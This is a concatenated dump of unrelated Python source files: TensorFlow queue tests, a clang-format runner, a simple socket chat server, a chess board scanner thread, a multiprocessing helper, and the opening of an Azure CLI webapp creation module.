enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
sess.run(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, dequeued_t.eval())
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 40.0, 50.0]:
self.assertEqual(elem, dequeued_t.eval())
self.assertEqual(0, q.size().eval())
def testBlockingEnqueueManyBeforeClose(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
sess.run(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, dequeued_t.eval())
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 50.0, 60.0]:
self.assertEqual(elem, dequeued_t.eval())
def testDoesNotLoseValue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(1, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
size_t = q.size()
enqueue_op.run()
for _ in range(500):
self.assertEqual(size_t.eval(), [1])
def testSharedQueueSameSession(self):
with self.test_session():
q1 = tf.PaddingFIFOQueue(
1, tf.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
q2 = tf.PaddingFIFOQueue(
1, tf.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q2.dequeue().eval(), [10.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q1.dequeue().eval(), [20.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
def testIncompatibleSharedQueueErrors(self):
with self.test_session():
q_a_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_a")
q_a_2 = tf.PaddingFIFOQueue(15, tf.float32, ((),), shared_name="q_a")
q_a_1.queue_ref.eval()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.eval()
q_b_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_b")
q_b_2 = tf.PaddingFIFOQueue(10, tf.int32, ((),), shared_name="q_b")
q_b_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_b_2.queue_ref.eval()
q_c_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_c")
q_c_2 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_c")
q_c_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_c_2.queue_ref.eval()
q_d_1 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_2 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_d")
q_d_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.eval()
q_e_1 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 4)], shared_name="q_e")
q_e_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.eval()
q_f_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_f")
q_f_2 = tf.PaddingFIFOQueue(
10, (tf.float32, tf.int32), ((), ()), shared_name="q_f")
q_f_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_f_2.queue_ref.eval()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(tf.PaddingFIFOQueue(10, tf.float32, ((),)))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = tf.PaddingFIFOQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = tf.PaddingFIFOQueue(10, tf.float32, ((),))
q2 = tf.PaddingFIFOQueue(15, tf.float32, ((),))
enq_q = tf.PaddingFIFOQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("Index must be in the range"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("Dequeue operation was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("Dequeue operation was cancelled"):
sess.run(dequeue_many_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("Enqueue operation was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("Enqueue operation was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.test_session() as sess:
q_empty = tf.PaddingFIFOQueue(5, tf.float32, ((),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
q_full = tf.PaddingFIFOQueue(5, tf.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(self._blockingDequeueMany, args=(sess,
dequeue_many_op)),
self.checkedThread(self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(self._blockingEnqueueMany, args=(sess,
enqueue_many_op))]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testBigEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(5, tf.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertAllEqual(elem, results)
def testBigDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(2, tf.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertAllEqual(elem, results)
def testDtypes(self):
with self.test_session() as sess:
dtypes = [tf.float32, tf.float64, tf.int32, tf.uint8, tf.int16, tf.int8,
tf.int64, tf.bool, tf.complex64, tf.complex128]
shape = (32, 4, 128)
q = tf.PaddingFIFOQueue(32, dtypes, [shape[1:]] * len(dtypes))
input_tuple = []
for dtype in dtypes:
np_dtype = dtype.as_numpy_dtype
np_array = np.random.randint(-10, 10, shape)
if dtype == tf.bool:
np_array = np_array > 0
elif dtype in (tf.complex64, tf.complex128):
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
input_tuple.append(np_array)
q.enqueue_many(input_tuple).run()
output_tuple_t = q.dequeue_many(32)
output_tuple = sess.run(output_tuple_t)
for (input_elem, output_elem) in zip(input_tuple, output_tuple):
self.assertAllEqual(input_elem, output_elem)
def testUnknownRank(self):
with self.assertRaisesRegexp(ValueError, "must have a defined rank"):
tf.PaddingFIFOQueue(32, [tf.float32], [tf.TensorShape(None)])
class QueueFromListTest(tf.test.TestCase):
def testQueueFromListShapes(self):
which = tf.constant(1)
def _cmp(expected, *shapes):
qs = [
tf.PaddingFIFOQueue(10, [tf.float32], [tf.TensorShape(s)])
for s in shapes]
s_expected = tf.TensorShape(expected)
s = tf.QueueBase.from_list(which, qs).shapes[0]
if s_expected.ndims is None:
self.assertEqual(s_expected.ndims, s.ndims)
else:
self.assertEqual(s_expected.as_list(), s.as_list())
_cmp(None, [1, None], [None])
_cmp([None], [1], [2])
_cmp([1, None], [1, 1], [1, 2])
_cmp([1, None], [1, 1], [1, None])
_cmp([None, None], [None, 1], [1, None])
_cmp([1], [1], [1], [1])
_cmp([None], [1], [None], [1])
_cmp(None, [1, None], [1], [1])
def testQueueFromListShapesMultipleComponents(self):
q_u_u = tf.PaddingFIFOQueue(
10,
[tf.float32, tf.int32],
[tf.TensorShape([None]), tf.TensorShape([None])])
q_u_f = tf.PaddingFIFOQueue(
10, [tf.float32, tf.int32],
[tf.TensorShape([None]), tf.TensorShape([1, 2])])
q_f_f = tf.PaddingFIFOQueue(
10, [tf.float32, tf.int32],
[tf.TensorShape([3, 4]), tf.TensorShape([1, 2])])
which = tf.constant(1)
s_cmp_1 = tf.QueueBase.from_list(which, [q_u_u, q_u_u, q_u_u]).shapes
self.assertEqual([1, 1], [x.ndims for x in s_cmp_1])
self.assertEqual([None, None], [x.as_list()[0] for x in s_cmp_1])
s_cmp_2 = tf.QueueBase.from_list(which, [q_u_u, q_u_u, q_u_f]).shapes
self.assertEqual([1, None], [x.ndims for x in s_cmp_2])
self.assertEqual([None], s_cmp_2[0].as_list())
s_cmp_3 = tf.QueueBase.from_list(which, [q_f_f, q_f_f]).shapes
self.assertEqual([2, 2], [x.ndims for x in s_cmp_3])
self.assertEqual([[3, 4], [1, 2]], [x.as_list() for x in s_cmp_3])
if __name__ == "__main__":
tf.test.main()
|
run-clang-format.py
|
#!/usr/bin/env python
import argparse
import json
import multiprocessing
import os
import re
import subprocess
import sys
import threading
from pathlib import Path
import queue as queue
def get_format_invocation(f, clang_format_binary):
"""Gets a command line for clang-tidy."""
start = [clang_format_binary, "-i", f]
return start
def run_format(args, file_queue, lock):
"""Takes filenames out of queue and runs clang-tidy on them."""
while True:
name = file_queue.get()
invocation = get_format_invocation(name, args.clang_format_binary)
proc = subprocess.Popen(
invocation, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
output, err = proc.communicate()
with lock:
sys.stdout.write(" ".join(invocation) + "\n" + output.decode("utf-8"))
if len(err) > 0:
sys.stdout.flush()
sys.stderr.write(err.decode("utf-8"))
file_queue.task_done()
def main():
parser = argparse.ArgumentParser(
description="Runs clang-format over all files " "in a compilation database."
)
parser.add_argument(
"-clang-format-binary",
metavar="PATH",
default="clang-format",
help="path to clang-format binary",
)
parser.add_argument(
"-i", action="store_true", help="Inplace edit <file>s, if specified"
)
parser.add_argument(
"-j",
type=int,
default=0,
help="number of format instances to be run in parallel.",
)
parser.add_argument(
"files",
nargs="*",
default=[".*"],
help="files to be processed (regex on path)",
)
parser.add_argument(
"-p",
dest="build_path",
help="Path used to read a compile command database.",
)
args = parser.parse_args()
db_path = "compile_commands.json"
build_path = args.build_path
# Load the database and extract all files.
database = json.load(open(os.path.join(build_path, db_path)))
cwd = Path.cwd()
# Build up a big regexy filter from all command line arguments.
file_name_re = re.compile("|".join(args.files))
files = []
for entry in database:
directory = Path(entry["directory"])
file = directory / entry["file"]
relative_path = file.relative_to(cwd)
if file_name_re.search(str(relative_path)):
files.append(str(file))
print(relative_path)
max_task = args.j
if max_task == 0:
max_task = multiprocessing.cpu_count()
try:
# Spin up a bunch of tidy-launching threads.
task_queue = queue.Queue(max_task)
# List of files with a non-zero return code.
lock = threading.Lock()
for _ in range(max_task):
t = threading.Thread(target=run_format, args=(args, task_queue, lock))
t.daemon = True
t.start()
# Fill the queue with files.
for name in files:
task_queue.put(name)
# Wait for all threads to be done.
task_queue.join()
except KeyboardInterrupt:
# This is a sad hack. Unfortunately subprocess goes
# bonkers with ctrl-c and we start forking merrily.
print("\nCtrl-C detected, goodbye.")
os.kill(0, 9)
if __name__ == "__main__":
main()
|
server.py
|
"""
MIT License
Copyright (c) 2021 CarlFandino
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import socket
import threading
import sys,time
class Server:
def __init__(self):
try:
self.ip = socket.gethostbyname(socket.gethostname())
self.port = 8080
self.socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.socket.bind((self.ip,self.port))
self.socket.listen(5)
self.numberOfOnline = 0
self.messages = []
self.users = {}
self.clients = []
threading.Thread(target=self.start).start()
except KeyboardInterrupt:
sys.exit()
def broadcast(self,message):
for client in self.clients:
client.send(str(message).encode())
self.messages.append(message)
def handle(self,addr,conn):
connected = True
self.clients.append(conn)
conn.send(f"\nloadMessage \n{[(i) for i in self.messages]}\n".encode())
while connected:
try:
data = conn.recv(1024).decode()
data = str(data)
if data.split()[0] == "nickname":
self.users[str(addr)] = data.split()[1]
self.userJoined(data.split()[1])
if data.split()[0] == "quit":
self.userQuit(self.users[str(addr)])
self.users.pop(str(addr))
if data.split()[0] == "chat":
self.userChat(self.users[str(addr)],data.replace('chat',''))
except ConnectionResetError:
#print(f"{self.users[str(addr)]} left.")
self.clients.pop(self.clients.index(conn))
connected = False
except ConnectionAbortedError:
self.clients.pop(self.clients.index(conn))
connected = False
except:
pass
def start(self):
print("SERVER RUNNING...")
while True:
self.conn, self.addr = self.socket.accept()
threading.Thread(target=self.handle,args=(self.addr,self.conn,),daemon=True).start()
def userChat(self,name,chat):
self.broadcast(f"chat from {name} : {chat}")
def userJoined(self,name):
self.broadcast(f"join {name} joined.")
self.numberOfOnline += 1
def userQuit(self,name):
self.broadcast(f"left {name} left.")
self.numberOfOnline -= 1
Server()
|
ScanThread.py
|
from threading import Thread
from typing import Callable, Any
import boardController
from chess import SquareSet
class ScanThread:
def __init__(self, callback: Callable[[SquareSet], Any]):
self._callback = callback
self._thread = Thread(name="ScanThread", target=self._scan_loop)
self._should_quit = False
def start(self):
self._thread.start()
def quit(self):
self._should_quit = True
def _scan_loop(self):
while True:
board = boardController.awaitBoardChange()
self._callback(board)
|
_multiprocessing.py
|
from __future__ import annotations
import os
import multiprocessing
import sys
from ._imports import multiprocessing_connection
def run_in_process(
target, name=None, args=(), kwargs=None, allow_detach=False, timeout=None
):
"""Run provided target in a multiprocessing.Process.
This function does not require that the `target` and arguments
are picklable. Only the return value of `target` must be.
Args:
target: same as multiprocessing.Process
name: same as multiprocessing.Process
args: same as multiprocessing.Process
kwargs: same as multiprocessing.Process
allow_detach: passes a callback as the first argument to the function
that, when invoked, detaches from the parent by forking.
timeout: seconds after which processing will be aborted and
the child process killed
Returns:
The return value of `target`
Raises:
*: Any exception raised by `target`.
TimeoutError: If a timeout occurs.
"""
if not kwargs:
kwargs = {}
def launcher():
# multiprocessing doesn't offer a good way to detach from the parent
# process, allowing the child to exist without being cleaned up at
# parent close. So given
#
# 1. parent process (which invoked run_in_process)
# 2. runner process (executing target function)
#
# we fork (2), creating (3) then continue executing in (3) and forcibly
# exit (2).
#
# The downside of this approach is that any exceptions from the
# process after detaching will not be propagated to the caller
# (and Windows incompatibility).
def detach(result=None):
# Indicate no exception.
child_pipe.send(False)
child_pipe.send(result)
pid = os.fork()
if pid:
# Ensure we don't return to caller within the subprocess.
os._exit(0)
new_args = list(args)
if allow_detach:
new_args.insert(0, detach)
try:
result = target(*new_args, **kwargs)
except:
child_pipe.send(True)
from tblib import pickling_support
pickling_support.install()
child_pipe.send(sys.exc_info())
# Wait for signal from parent process to avoid exit/read race
# condition.
child_pipe.recv()
# We don't really want the exception traced by multiprocessing
# so exit like Python would.
sys.exit(1)
else:
child_pipe.send(False)
child_pipe.send(result)
child_pipe.recv()
ctx = multiprocessing.get_context("fork")
child_pipe, parent_pipe = ctx.Pipe()
p = ctx.Process(target=launcher, name=name)
p.start()
ready = multiprocessing_connection.wait([p.sentinel, parent_pipe], timeout=timeout)
# Timeout
if not ready:
p.kill()
raise TimeoutError("Timeout running function.")
exc = None
result = None
if parent_pipe in ready:
error = parent_pipe.recv()
if error:
from tblib import pickling_support
pickling_support.install()
_, exception, tb = parent_pipe.recv()
exc = exception.with_traceback(tb)
else:
result = parent_pipe.recv()
if p.sentinel in ready:
# This can happen if the child process closes file descriptors, but we
# do not handle it.
assert p.exitcode is not None, "Exit code must exist"
if p.exitcode:
if not exc:
exc = RuntimeError(f"Process died with return code {p.exitcode}")
else:
# Indicate OK to continue.
parent_pipe.send(True)
p.join()
if exc:
raise exc
return result
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import ast
import threading
import time
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
import invoke
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError,
CLIInternalError, UnclassifiedUserFault, AzureResponseError,
ArgumentUsageError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_name,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp,
_normalize_location,
get_pool_manager)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH)
from ._github_oauth import (get_github_access_token)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
from azure.mgmt.web.models import Site
SiteConfig, SkuDescription, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
if subnet or vnet:
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up, virtual_network_subnet_id=subnet_resource_id)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
# portal uses the current_stack propety in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location):
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet_location = vnet_client.get(resource_group_name=subnet_resource_group,
virtual_network_name=vnet_name).location
vnet_location = _normalize_location(cmd, vnet_location)
asp_location = _normalize_location(cmd, webapp_location)
if vnet_location != asp_location:
raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. "
"vnet location: {}. Plan location: {}.".format(vnet_location, asp_location))
def _get_subnet_info(cmd, resource_group_name, vnet, subnet):
from azure.cli.core.commands.client_factory import get_subscription_id
subnet_info = {"vnet_name": None,
"subnet_name": None,
"resource_group_name": None,
"subnet_resource_id": None,
"subnet_subscription_id": None,
"vnet_resource_id": None}
if is_valid_resource_id(subnet):
if vnet:
logger.warning("--subnet argument is a resource ID. Ignoring --vnet argument.")
parsed_sub_rid = parse_resource_id(subnet)
subnet_info["vnet_name"] = parsed_sub_rid["name"]
subnet_info["subnet_name"] = parsed_sub_rid["resource_name"]
subnet_info["resource_group_name"] = parsed_sub_rid["resource_group"]
subnet_info["subnet_resource_id"] = subnet
subnet_info["subnet_subscription_id"] = parsed_sub_rid["subscription"]
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(parsed_sub_rid["subscription"],
parsed_sub_rid["resource_group"],
parsed_sub_rid["name"])
return subnet_info
subnet_name = subnet
